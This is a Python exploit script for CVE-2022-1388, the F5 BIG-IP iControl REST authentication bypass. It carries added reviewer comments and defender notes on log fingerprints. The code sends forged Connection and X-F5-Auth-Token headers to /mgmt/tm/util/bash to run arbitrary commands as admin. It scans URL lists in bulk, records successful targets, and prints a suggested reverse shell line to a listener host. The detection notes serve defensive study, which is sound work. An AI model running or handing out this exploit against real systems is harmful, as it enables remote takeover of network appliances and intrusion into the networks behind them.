# -*- coding: utf-8 -*-
import argparse,pyfiglet,requests,threading,json
from concurrent.futures import ThreadPoolExecutor
# Silences urllib3 warnings, including the one normally emitted for
# verify=False requests. Every request in this file passes verify=False, so
# TLS certificates are never validated and no warning says so.
requests.packages.urllib3.disable_warnings()
banner = pyfiglet.figlet_format("4pts Attack")
print(banner)
# Every request in this file is sent through this hard-coded local proxy.
# NOTE(review): if nothing is listening on 127.0.0.1:11223 the requests raise,
# and the callers report that as a connection failure / "url exception" for
# the target, so those messages do not describe the target's state.
proxies={
    'http':'127.0.0.1:11223',
    'https':'127.0.0.1:11223'
}
# Module-level lock used by saveMessage() to serialise appends to result files
# when several worker threads report at once.
R = threading.Lock()
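def saveMessage(content,file):
    """Append ``content`` followed by a newline to ``file``.

    The write is done while holding the module-level lock ``R`` so that
    concurrent worker threads do not interleave their lines.

    Args:
        content: Text to append (a newline is added).
        file: Path of the file to append to; opened in ``a+`` mode with
            ``utf-8-sig`` encoding.
    """
    # Context managers release the lock and close the file even when open()
    # or write() raises. The original acquire()/release() pair left R held on
    # an error, which would block every later writer thread.
    with R:
        with open(file, 'a+', encoding='utf-8-sig') as fp:
            fp.write(content+"\n")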
def headers1():
    """Return the first of the two header sets that ``PocExp`` sends.

    The set carries a browser User-Agent, a JSON content type, a dummy
    ``X-F5-Auth-Token`` value, Basic credentials for the user ``admin``, and a
    ``Connection`` header that names ``X-F5-Auth-Token`` and several
    forwarding headers.

    Detection note: the ``Connection`` value is the recognisable part of this
    request. It lists ``X-F5-Auth-Token``, and the literal also starts with
    the text ``Connection: `` inside the value itself. As far as this reviewer
    knows, ordinary iControl REST clients do not send such a value, so a
    request to ``/mgmt/...`` carrying it is worth logging and alerting on.
    """
    browser_ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36"
    connection_value = 'Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host'
    # Built from ordered pairs so the header order matches the original dict.
    header_items = [
        ("User-Agent", browser_ua),
        ('Content-Type', 'application/json'),
        ('Connection', connection_value),
        ('X-F5-Auth-Token', 'asdf'),
        ('Authorization', 'Basic YWRtaW46aG9yaXpvbjM='),
    ]
    return dict(header_items)
def headers2():
    """Return the header set used by ``attack`` and as ``PocExp``'s second try.

    Compared with ``headers1`` it adds ``Accept-Encoding`` and ``Accept``,
    sets ``X-F5-Auth-Token`` to ``0`` and sends Basic credentials for the user
    ``admin`` with an empty password. The ``Connection`` value is the same.

    Detection note: the ``Connection`` value lists ``X-F5-Auth-Token`` and
    begins with the literal text ``Connection: `` inside the value. A request
    to ``/mgmt/...`` with that pattern is worth logging and alerting on.
    """
    browser_ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36"
    connection_value = 'Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host'
    # Built from ordered pairs so the header order matches the original dict.
    header_items = [
        ("Accept-Encoding", "gzip, deflate"),
        ("Accept", "*/*"),
        ("User-Agent", browser_ua),
        ('Content-Type', 'application/json'),
        ('Connection', connection_value),
        ('X-F5-Auth-Token', '0'),
        ('Authorization', 'Basic YWRtaW46'),
    ]
    return dict(header_items)
def check(url):
    """Probe ``url`` for a reachable iControl REST login endpoint.

    Sends a GET to ``url + "/mgmt/shared/authn/login"`` through the
    module-level ``proxies`` with ``verify=False`` and a 10 second timeout.
    If the response text contains ``resterrorresponse`` the host is printed as
    exposed and the probed URL is appended to ``poc.txt``.

    NOTE(review): this only shows that the REST login endpoint answered with
    the expected error marker. It does not test the CVE, so the
    "F5 not vulnerable" message overstates the result: it means the marker
    was absent, not that the device is patched.
    """
    try:
        target_url = url + "/mgmt/shared/authn/login"
        res = requests.get(target_url, verify=False, timeout=10,proxies=proxies)
        if "resterrorresponse" in res.text:
            print("[+] Host: "+url+" F5 iControl Rest API exposed ")
            saveMessage(target_url,"poc.txt")
        else:
            print("[-] Host: "+url+" F5 not vulnerable ")
    except Exception as e:
        # Every failure is reported as "Connection Fail" and the exception is
        # discarded. That includes an unreachable local proxy and a failing
        # saveMessage() call, so treat this message as inconclusive.
        print("[x] Host: "+url+" Connection Fail ")
def attack(target_url, cmd):
    """POST ``cmd`` to ``target_url + '/mgmt/tm/util/bash'`` and print the outcome.

    The request uses the ``headers2()`` header set, the module-level
    ``proxies``, ``verify=False`` and a 5 second timeout. A 200 response whose
    body contains ``commandResult`` is printed as vulnerable together with the
    returned output. Any other response is printed as not vulnerable.

    Defender notes:
      * Seen from the appliance, this is a POST to ``/mgmt/tm/util/bash`` with
        a JSON body holding ``command`` and ``utilCmdArgs``. Together with the
        ``Connection`` header built by ``headers2()``, that is the pattern to
        look for in REST, audit and reverse-proxy logs.
      * A "Vulnerable" result means a command ran on the device. Respond by
        applying the vendor's fixed release and by restricting access to the
        management interface and iControl REST to trusted networks.
      * "Not Vulnerable" is printed for any non-matching response, including
        one produced by an intermediate proxy or filter, so it is not proof
        that the device is patched.
    """
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {"command": "run", "utilCmdArgs": "-c {0}".format(cmd)}
    print(data)
    try:
        response = requests.post(url=attack_url, json=data, headers=headers2(),proxies=proxies, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] Target {} Vulnerable".format(target_url))
            print("suggested command for a reverse shell!: bash -i >&/dev/tcp/10.10.10.10/9999 0>&1")
            print('[+] Response:{0}'.format(display))
        else:
            print("[-] Target {} Not Vulnerable".format(target_url))
    except Exception as e:
        # The exception is discarded, so timeouts, proxy errors and JSON
        # parsing errors all look the same here. Treat the message as
        # inconclusive.
        print('url exception {0}'.format(target_url))
def PocExp(target_url):
    """Send a fixed ``-c id`` request to ``target_url`` with both header sets.

    Two POSTs go to ``target_url + '/mgmt/tm/util/bash'``, one with
    ``headers1()`` and one with ``headers2()``. Both use the module-level
    ``proxies``, ``verify=False`` and a 10 second timeout. If either response
    is a 200 containing ``commandResult``, the target is printed as vulnerable
    and appended to ``success.txt``.

    Defender notes:
      * Each target receives two near-identical POSTs in quick succession
        that differ only in their header set. That pairing is a usable
        fingerprint of this tool in access logs.
      * NOTE(review): only ``response`` (the first request) is parsed, even
        when ``response2`` alone matched. In that case the JSON lookup can
        raise, and the target is then reported as "url exception" and is not
        written to ``success.txt``. Anyone using this output to confirm a
        patch should treat "url exception" as inconclusive.
    """
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {"command": "run", "utilCmdArgs": "-c id"}
    # data = {"command": "run", "utilCmdArgs": "-c {0}".format(cmd)}
    # print(data)
    try:
        response = requests.post(url=attack_url, json=data, headers=headers1(),proxies=proxies, verify=False, timeout=10)
        response2 = requests.post(url=attack_url, json=data, headers=headers2(),proxies=proxies, verify=False, timeout=10)
        if (response.status_code == 200 and 'commandResult' in response.text) or (response2.status_code == 200 and 'commandResult' in response2.text):
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] Target {} Vulnerable".format(target_url))
            print("suggested command for a reverse shell!: bash -i >&/dev/tcp/10.10.10.10/9999 0>&1")
            print('[+] Response:{0}'.format(display))
            saveMessage(target_url,"success.txt")
        else:
            print("[-] Target {} Not Vulnerable".format(target_url))
    except Exception as e:
        # The exception is discarded; network, proxy and parsing failures are
        # indistinguishable in the output.
        print('url exception {0}'.format(target_url))
# Command-line entry point: parse -u/-f/-c and dispatch to check(), attack()
# or PocExp(). Indentation below is reconstructed from the statement order.
if __name__ == '__main__':
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="Please CVE-2022-1388.py -u host")
    parse.add_argument("-f", "--file", help="Please CVE-2022-1388.py -f file")
    # NOTE(review): the help text repeats the -f text, and the default "id"
    # means `command` is never None below.
    parse.add_argument("-c", "--command", default="id", help="Please CVE-2022-1388.py -f file")
    args = parse.parse_args()
    url = args.url
    command = args.command
    filepath = args.file
    # NOTE(review): because --command defaults to "id", the two
    # `command is None` branches are unreachable, so check() is never called.
    # Running with only -u or only -f therefore goes straight to the
    # command-execution paths (attack / PocExp), not to the exposure check
    # that the usage text describes.
    if url is not None and filepath is None and command is None:
        check(url)
    elif url is None and filepath is not None and command is None:
        for x in open(filepath, "r").readlines():
            pool = ThreadPoolExecutor(10)
            pool.submit(check, x.strip())
    elif command is not None and url is not None and filepath is None:
        attack(url, command)
    elif command is not None and url is None and filepath is not None:
        # PocExp() takes no command argument and always sends `-c id`, so the
        # -c value is ignored on this path.
        for x in open(filepath, "r").readlines():
            pool = ThreadPoolExecutor(10)
            pool.submit(PocExp, x.strip())
    else:
        # Reached when neither -u nor -f is given, or when both are given.
        print('''
+-----------------------------------------------------------------+
Title: F5 BIG-IP iControl Rest API exposed Check
Fofa: icon_hash="-335242539"
Usage Single URL:python3 CVE-2022-1388.py -u url
Usage, List of URLS:python3 CVE-2022-1388.py -f url.txt
Usage, Exec:python3 CVE-2022-1388.py -u url -c command
Usage, ExecFile:python3 CVE-2022-1388.py -f url.txt -c id
+-----------------------------------------------------------------+
''')